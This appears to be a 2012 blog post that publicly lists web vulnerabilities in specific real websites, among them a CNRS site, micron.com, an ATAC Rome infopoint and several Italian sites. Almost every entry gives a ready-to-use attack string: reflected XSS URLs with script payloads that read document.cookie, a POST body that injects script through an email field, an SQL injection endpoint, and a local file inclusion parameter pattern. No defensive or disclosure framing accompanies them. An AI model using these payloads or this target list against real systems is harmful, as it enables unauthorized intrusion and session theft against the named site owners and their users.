Tuesday, 17 April 2012

http://www.hstl.crhst.cnrs.fr | XSS

http://www.hstl.crhst.cnrs.fr/i-corpus/histmap/informations/bollettino.php?lang=en%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22

vanthuanobservatory | sql injection

SQL Injection
http://www.vanthuanobservatory.org/bollettini-dsc/bollettino.php?lang=en

http://www.mnitalia.com | php local file inclusion, privileges escalation, system compromise

sample page
http://www.mnitalia.com/home/index.php?page=page.php&cat=webmarketing

http://www.mnitalia.com/home/index.php?page={file inclusion here}&cat=*

primomaggio.com | XSS

POST
http://www.primomaggio.com/newsletter.php

POSTDATA
nome=chick&cognome=chick&email=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Echick%40mailinator.com&x=40&y=7&send=1

_____
An Sql injection was available in the login area of the forum of the previous website (in asp as far as I can remember).

http://infopoint.atac.roma.it | xss

http://infopoint.atac.roma.it/bw.asp?lingua=ita%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3Cscript%20src=%22

http://www.micron.com | XSS

http://www.micron.com/search?q=%3Cscript%3Ealert%28document.cookie%29%3b%3C%2fscript%3E